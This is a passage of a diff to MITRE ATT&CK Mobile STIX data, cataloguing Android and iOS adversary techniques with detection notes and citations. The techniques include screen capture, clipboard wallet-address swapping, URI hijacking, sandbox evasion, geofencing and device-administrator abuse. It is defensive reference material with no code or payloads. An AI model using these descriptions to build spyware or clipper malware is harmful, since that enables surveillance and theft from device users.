"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:57:43.022Z", + "name": "Screen Capture", + "description": "Adversaries may use screen capture to collect additional information about a target device, such as applications running in the foreground, user data, credentials, or other sensitive information. 
Applications running in the background can capture screenshots or videos of another application running in the foreground by using the Android `MediaProjectionManager` (generally requires the device user to grant consent).(Citation: Fortinet screencap July 2019)(Citation: Android ScreenCap1 2019) Background applications can also use Android accessibility services to capture screen contents being displayed by a foreground application.(Citation: Lookout-Monokle) An adversary with root access or Android Debug Bridge (adb) access could call the Android `screencap` or `screenrecord` commands.(Citation: Android ScreenCap2 2019)(Citation: Trend Micro ScreenCap July 2015) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "The user can view a list of apps with accessibility service privileges in the device settings. Application vetting services can look for the use of the Android `MediaProjectionManager` class, applying extra scrutiny to applications that use the class.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.3", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--73c26732-6422-4081-8b63-6d0ae93d449e", + "created": "2019-08-08T18:34:14.178Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1513", + "external_id": "T1513" + }, + { + "source_name": "Android ScreenCap2 2019", + "description": "Android Developers. (n.d.). Android Debug Bridge (adb). Retrieved August 8, 2019.", + "url": "https://developer.android.com/studio/command-line/adb" + }, + { + "source_name": "Android ScreenCap1 2019", + "description": "Android Developers. (n.d.). 
Android MediaProjectionManager. Retrieved August 8, 2019.", + "url": "https://developer.android.com/reference/android/media/projection/MediaProjectionManager" + }, + { + "source_name": "Lookout-Monokle", + "description": "Bauer A., Kumar A., Hebeisen C., et al. (2019, July). Monokle: The Mobile Surveillance Tooling of the Special Technology Center. Retrieved September 4, 2019.", + "url": "https://www.lookout.com/documents/threat-reports/lookout-discovers-monokle-threat-report.pdf" + }, + { + "source_name": "Fortinet screencap July 2019", + "description": "Dario Durando. (2019, July 3). BianLian: A New Wave Emerges. Retrieved September 4, 2019.", + "url": "https://www.fortinet.com/blog/threat-research/new-wave-bianlian-malware.html" + }, + { + "source_name": "Trend Micro ScreenCap July 2015", + "description": "Zhang, V. (2015, July 21). Hacking Team RCSAndroid Spying Tool Listens to Calls; Roots Devices to Get In. Retrieved August 8, 2019.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/hacking-team-rcsandroid-spying-tool-listens-to-calls-roots-devices-to-get-in/" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-40.html", + "external_id": "APP-40" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:44:26.748Z", + "name": "Transmitted Data Manipulation", + "description": "Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity. 
By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, or decision making.\n\nManipulation may be possible over a network connection or between system processes where there is an opportunity to deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system, typically gained through a prolonged information gathering campaign, in order to have the desired impact.\n\nOne method to achieve [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1641/001) is by modifying the contents of the device clipboard. Malicious applications may monitor clipboard activity through the `ClipboardManager.OnPrimaryClipChangedListener` interface on Android to determine when clipboard contents have changed. Listening to clipboard activity, reading clipboard contents, and modifying clipboard contents requires no explicit application permissions and can be performed by applications running in the background. However, this behavior has changed with the release of Android 10.\n\nAdversaries may use [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1641/001) to replace text prior to being pasted. For example, replacing a copied Bitcoin wallet address with a wallet address that is under adversarial control.\n\n[Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1641/001) was seen within the Android/Clipper.C trojan. 
This sample was detected by ESET in an application distributed through the Google Play Store targeting cryptocurrency wallet numbers.(Citation: ESET Clipboard Modification February 2019)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "impact" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Applications could be vetted for their use of the clipboard manager APIs with extra scrutiny given to application that make use of them.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--74e6003f-c7f4-4047-983b-708cc19b96b6", + "created": "2022-04-06T13:39:39.779Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1641/001", + "external_id": "T1641.001" + }, + { + "source_name": "ESET Clipboard Modification February 2019", + "description": "ESET. (2019, February 11). First clipper malware discovered on Google Play.. 
Retrieved July 26, 2019.", + "url": "https://www.eset.com/uk/about/newsroom/press-releases/first-clipper-malware-discovered-on-google-play-1/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--76c12fc8-a4eb-45d6-a3b7-e371a7248f69", + "created": "2017-10-25T14:48:07.460Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1452", + "url": "https://attack.mitre.org/techniques/T1452" + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "An adversary could use access to a compromised device's credentials to attempt to manipulate app store rankings or ratings by triggering application downloads or posting fake reviews of applications. 
This technique likely requires privileged access (a rooted or jailbroken device).", + "modified": "2022-04-06T13:57:24.726Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Manipulate App Store Rankings or Ratings", + "x_mitre_detection": "", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "impact" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--77e30eee-fd48-40b4-99ec-73e97c158b58", + "created": "2017-10-25T14:48:32.008Z", + "x_mitre_version": "2.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1416", + "url": "https://attack.mitre.org/techniques/T1416" + }, + { + "source_name": "Trend Micro iOS URL Hijacking", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/ios-url-scheme-susceptible-to-hijacking/", + "description": "L. Wu, Y. Zhou, M. Li. (2019, July 12). iOS URL Scheme Susceptible to Hijacking. Retrieved September 11, 2020." + }, + { + "source_name": "IETF-PKCE", + "url": "https://tools.ietf.org/html/rfc7636", + "description": "N. Sakimura, J. Bradley, and N. Agarwal. (2015, September). IETF RFC 7636: Proof Key for Code Exchange by OAuth Public Clients. Retrieved December 21, 2016." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "Adversaries may register Uniform Resource Identifiers (URIs) to intercept sensitive data.\n\nApplications regularly register URIs with the operating system to act as a response handler for various actions, such as logging into an app using an external account via single sign-on. This allows redirections to that specific URI to be intercepted by the application. If a malicious application were to register for a URI that was already in use by a genuine application, the malicious application may be able to intercept data intended for the genuine application or perform a phishing attack against the genuine application. Intercepted data may include OAuth authorization codes or tokens that could be used by the malicious application to gain access to resources.(Citation: Trend Micro iOS URL Hijacking)(Citation: IETF-PKCE)", + "modified": "2022-04-01T15:17:21.508Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "URI Hijacking", + "x_mitre_detection": "On Android, users may be presented with a popup to select the appropriate application to open the URI in. If the user sees an application they do not recognize, they can remove it.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T15:28:54.940Z", + "name": "Compromise Software Dependencies and Development Tools", + "description": "Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise. Applications often depend on external software to function properly. 
Popular open source projects that are used as dependencies in many applications may be targeted as a means to add malicious code to users of the dependency.(Citation: Grace-Advertisement)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Usage of insecure or malicious third-party libraries could be detected by application vetting services. Malicious software development tools could be detected by enterprises that deploy endpoint protection software on computers that are used to develop mobile apps. Application vetting could detect the usage of insecure or malicious third-party libraries.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--7827ced0-95e7-4d05-bdcf-0d8f2d37a3d3", + "created": "2022-03-28T19:31:51.978Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1474/001", + "external_id": "T1474.001" + }, + { + "source_name": "Grace-Advertisement", + "description": "M. Grace et al. (2012, April 16-18). Unsafe exposure analysis of mobile in-app advertisements. 
Retrieved December 22, 2016.", + "url": "https://www.csc2.ncsu.edu/faculty/xjiang4/pubs/WISEC12_ADRISK.pdf" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-6.html", + "external_id": "APP-6" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-0.html", + "external_id": "SPC-0" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-3.html", + "external_id": "SPC-3" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-9.html", + "external_id": "SPC-9" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-10.html", + "external_id": "SPC-10" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-15.html", + "external_id": "SPC-15" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--786f488c-cb1f-4602-89c5-86d982ee326b", + "created": "2019-10-02T14:46:43.632Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1523", + "url": "https://attack.mitre.org/techniques/T1523" + }, + { + "source_name": "Sophos Anti-emulation", + "url": 
"https://news.sophos.com/en-us/2017/04/13/android-malware-anti-emulation-techniques/", + "description": "Chen Yu et al. . (2017, April 13). Android malware anti-emulation techniques. Retrieved October 2, 2019." + }, + { + "source_name": "Xiao-ZergHelper", + "url": "http://researchcenter.paloaltonetworks.com/2016/02/pirated-ios-app-stores-client-successfully-evaded-apple-ios-code-review/", + "description": "Claud Xiao. (2016, February 21). Pirated iOS App Store’s Client Successfully Evaded Apple iOS Code Review. Retrieved December 12, 2016." + }, + { + "source_name": "Cyberscoop Evade Analysis January 2019", + "url": "https://www.cyberscoop.com/android-malware-motion-detection-trend-micro/", + "description": "Jeff Stone. (2019, January 18). Sneaky motion-detection feature found on Android malware. Retrieved October 2, 2019." + }, + { + "source_name": "ThreatFabric Cerberus", + "url": "https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html", + "description": "ThreatFabric. (2019, August). Cerberus - A new banking Trojan from the underworld. Retrieved September 18, 2019." + }, + { + "source_name": "Github Anti-emulator", + "url": "https://github.com/strazzere/anti-emulator", + "description": "Tim Strazzere. (n.d.). Android Anti-Emulator. Retrieved October 2, 2019." + }, + { + "source_name": "Talos Gustuff Apr 2019", + "url": "https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html", + "description": "Vitor Ventura. (2019, April 9). Gustuff banking botnet targets Australia . Retrieved September 3, 2019." + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "Malicious applications may attempt to detect their operating environment prior to fully executing their payloads. These checks are often used to ensure the application is not running within an analysis environment such as a sandbox used for application vetting, security research, or reverse engineering. 
\nAdversaries may use many different checks such as physical sensors, location, and system properties to fingerprint emulators and sandbox environments.(Citation: Talos Gustuff Apr 2019)(Citation: ThreatFabric Cerberus)(Citation: Xiao-ZergHelper)(Citation: Cyberscoop Evade Analysis January 2019) Adversaries may access `android.os.SystemProperties` via Java reflection to obtain specific system information.(Citation: Github Anti-emulator) Standard values such as phone number, IMEI, IMSI, device IDs, and device drivers may be checked against default signatures of common sandboxes.(Citation: Sophos Anti-emulation)\n", + "modified": "2022-03-30T17:54:56.590Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Evade Analysis Environment", + "x_mitre_detection": "Analysis Environment avoidance capabilities can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "discovery" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:43:49.443Z", + "name": "URI Hijacking", + "description": "Adversaries may register Uniform Resource Identifiers (URIs) to intercept sensitive data. \n\nApplications regularly register URIs with the operating system to act as a response handler for various actions, such as logging into an app using an external account via single sign-on. This allows redirections to that specific URI to be intercepted by the application. 
If an adversary were to register for a URI that was already in use by a genuine application, the adversary may be able to intercept data intended for the genuine application or perform a phishing attack against the genuine application. Intercepted data may include OAuth authorization codes or tokens that could be used by the adversary to gain access to protected resources.(Citation: Trend Micro iOS URL Hijacking)(Citation: IETF-PKCE) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_contributors": [ + "Leo Zhang, Trend Micro", + "Steven Du, Trend Micro" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "On Android, users may be presented with a popup to select the appropriate application to open the URI in. If the user sees an application they do not recognize, they can remove it. When vetting applications for potential security weaknesses, the vetting process could look for insecure use of Intents. Developers should be encouraged to use techniques to ensure that the intent can only be sent to an appropriate destination (e.g., use explicit rather than implicit intents, permission checking, checking of the destination app's signing certificate, or utilizing the App Links feature). For mobile applications using OAuth, encourage use of best practice. 
(Citation: IETF-OAuthNativeApps)(Citation: Android-AppLinks)", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--789ef15a-34d9-4b32-a779-8cbbc9eb32f5", + "created": "2022-04-01T15:15:35.640Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1635/001", + "external_id": "T1635.001" + }, + { + "source_name": "Android-AppLinks", + "description": "Android. (n.d.). Handling App Links. Retrieved December 21, 2016.", + "url": "https://developer.android.com/training/app-links/index.html" + }, + { + "source_name": "Trend Micro iOS URL Hijacking", + "description": "L. Wu, Y. Zhou, M. Li. (2019, July 12). iOS URL Scheme Susceptible to Hijacking. Retrieved September 11, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/ios-url-scheme-susceptible-to-hijacking/" + }, + { + "source_name": "IETF-PKCE", + "description": "N. Sakimura, J. Bradley, and N. Agarwal. (2015, September). IETF RFC 7636: Proof Key for Code Exchange by OAuth Public Clients. Retrieved December 21, 2016.", + "url": "https://tools.ietf.org/html/rfc7636" + }, + { + "source_name": "IETF-OAuthNativeApps", + "description": "W. Denniss and J. Bradley. (2017, October). IETF RFC 8252: OAuth 2.0 for Native Apps. 
Retrieved November 30, 2018.", + "url": "https://tools.ietf.org/html/rfc8252" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:52:52.097Z", + "name": "Subvert Trust Controls", + "description": "Adversaries may undermine security controls that will either warn users of untrusted activity or prevent execution of untrusted applications. Operating systems and security products may contain mechanisms to identify programs or websites as possessing some level of trust. Examples of such features include: an app being allowed to run because it is signed by a valid code signing certificate; an OS prompt alerting the user that an app came from an untrusted source; or getting an indication that you are about to connect to an untrusted site. The method adversaries use will depend on the specific mechanism they seek to subvert. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "On Android, the user can use the device settings menu to view trusted CA certificates and look for unexpected or unknown certificates. A mobile security product could similarly examine the trusted CA certificate store for anomalies. Users can use the device settings menu to view which applications on the device are allowed to install unknown applications. \n\nOn iOS, the user can use the device settings menu to view installed Configuration Profiles and look for unexpected or unknown profiles. 
A Mobile Device Management (MDM) system could use the iOS MDM APIs to examine the list of installed Configuration Profiles for anomalies.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--79cb02f4-ac4e-4335-8b51-425c9573cce1", + "created": "2022-03-30T18:05:46.795Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1632", + "external_id": "T1632" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/stack-threats/STA-7.html", + "external_id": "STA-7" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--79eec66a-9bd0-4a3f-ac82-19159e94bd44", + "created": "2017-10-25T14:48:11.116Z", + "x_mitre_version": "1.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1433", + "url": "https://attack.mitre.org/techniques/T1433" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-13.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-13" + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "On Android, an adversary could call standard operating system APIs from a malicious application to gather call log data, or 
with escalated privileges could directly access files containing call log data.\n\nOn iOS, applications do not have access to the call log, so privilege escalation would be required in order to access the data.", + "modified": "2022-04-01T13:14:43.174Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Access Call Log", + "x_mitre_detection": "On Android 6.0 and up, the user can view which applications have permission to access call log information through the device settings screen, and the user can choose to revoke the permissions.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--8197f026-64da-4700-93b9-b55ba55f3b31", + "created": "2020-09-11T15:04:14.532Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1581", + "url": "https://attack.mitre.org/techniques/T1581" + }, + { + "source_name": "Lookout eSurv", + "url": "https://blog.lookout.com/esurv-research", + "description": "A. Bauer. (2019, April 8). Lookout discovers phishing sites distributing new iOS and Android surveillanceware. Retrieved September 11, 2020." + }, + { + "source_name": "Apple Location Services", + "url": "https://developer.apple.com/documentation/corelocation/requesting_authorization_for_location_services", + "description": "Apple. (n.d.). Requesting Authorization for Location Services. Retrieved September 11, 2020." 
+ }, + { + "source_name": "Android Geofencing API", + "url": "https://developer.android.com/training/location/geofencing", + "description": "Google. (n.d.). Create and monitor geofences. Retrieved September 11, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "Adversaries may use a device’s geographical location to limit certain malicious behaviors. For example, malware operators may limit the distribution of a second stage payload to certain geographic regions.(Citation: Lookout eSurv)\n\n[Geofencing](https://attack.mitre.org/techniques/T1581) is accomplished by persuading the user to grant the application permission to access location services. The application can then collect, process, and exfiltrate the device’s location to perform location-based actions, such as ceasing malicious behavior or showing region-specific advertisements.\n\nOne method to accomplish [Geofencing](https://attack.mitre.org/techniques/T1581) on Android is to use the built-in Geofencing API to automatically trigger certain behaviors when the device enters or exits a specified radius around a geographical location. Similar to other [Geofencing](https://attack.mitre.org/techniques/T1581) methods, this requires that the user has granted the `ACCESS_FINE_LOCATION` and `ACCESS_BACKGROUND_LOCATION` permissions. The latter is only required if the application targets Android 10 (API level 29) or higher. However, Android 11 introduced additional permission controls that may restrict background location collection based on user permission choices at runtime. These additional controls include “Allow only while using the app”, which will effectively prohibit background location collection.(Citation: Android Geofencing API)\n\nSimilarly, on iOS, developers can use built-in APIs to setup and execute geofencing. 
Depending on the use case, the app will either need to call `requestWhenInUseAuthorization()` or `requestAlwaysAuthorization()`, depending on when access to the location services is required. Similar to Android, users also have the option to limit when the application can access the device’s location, including one-time use and only when the application is running in the foreground.(Citation: Apple Location Services)\n\n[Geofencing](https://attack.mitre.org/techniques/T1581) can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. For example, location data could be used to limit malware spread and/or capabilities, which could also potentially evade application analysis environments (ex: malware analysis outside of the target geographic area). Other malicious usages could include showing language-specific [Input Prompt](https://attack.mitre.org/techniques/T1411)s and/or advertisements.", + "modified": "2022-03-30T20:43:31.244Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Geofencing", + "x_mitre_detection": "Users can review which applications have location permissions in the operating system’s settings menu. 
On Android 10 and later, the system shows a notification to the user when an app has been accessing device location in the background.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--82f04b1e-5371-4a6f-be06-411f0f43b483", + "created": "2017-10-25T14:48:29.774Z", + "x_mitre_version": "2.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1401", + "url": "https://attack.mitre.org/techniques/T1401" + }, + { + "source_name": "Android DeviceAdminInfo", + "url": "https://developer.android.com/reference/android/app/admin/DeviceAdminInfo", + "description": "Google. (n.d.). DeviceAdminInfo. Retrieved November 20, 2020." 
+ }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-22.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-22" + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "Adversaries may request device administrator permissions to perform malicious actions.\n\nBy abusing the device administration API, adversaries can perform several nefarious actions, such as resetting the device’s password for [Device Lockout](https://attack.mitre.org/techniques/T1446), factory resetting the device to [Delete Device Data](https://attack.mitre.org/techniques/T1447) and any traces of the malware, disabling all of the device’s cameras, or make it more difficult to uninstall the app.(Citation: Android DeviceAdminInfo)\n\nDevice administrators must be approved by the user at runtime, with a system popup showing which of the actions have been requested by the app. In conjunction with other techniques, such as [Input Injection](https://attack.mitre.org/techniques/T1516), an app can programmatically grant itself administrator permissions without any user input.", + "modified": "2022-04-01T16:52:36.965Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Device Administrator Permissions", + "x_mitre_detection": "Users can see when an app requests device administrator permissions. 
Users can also view which apps have device administrator permissions in the settings menu.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "id": "attack-pattern--831e3269-da49-48ac-94dc-948008e8fd16", + "type": "attack-pattern", + "created": "2017-10-25T14:48:34.830Z", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-mobile-attack", + "url": "https://attack.mitre.org/techniques/T1443", + "external_id": "T1443" + } + ], + "modified": "2018-10-17T01:05:10.701Z", + "name": "Remotely Install Application", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": false + }, + { + "modified": "2023-03-20T18:45:39.362Z", + "name": "Keychain", + "description": "Adversaries may collect keychain data from an iOS device to acquire credentials. Keychains are the built-in way for iOS to keep track of users' passwords and credentials for many services and features such as Wi-Fi passwords, websites, secure notes, certificates, private keys, and VPN credentials. \n\nOn the device, the keychain database is stored outside of application sandboxes to prevent unauthorized access to the raw data. Standard iOS APIs allow applications access to their own keychain contained within the database. 
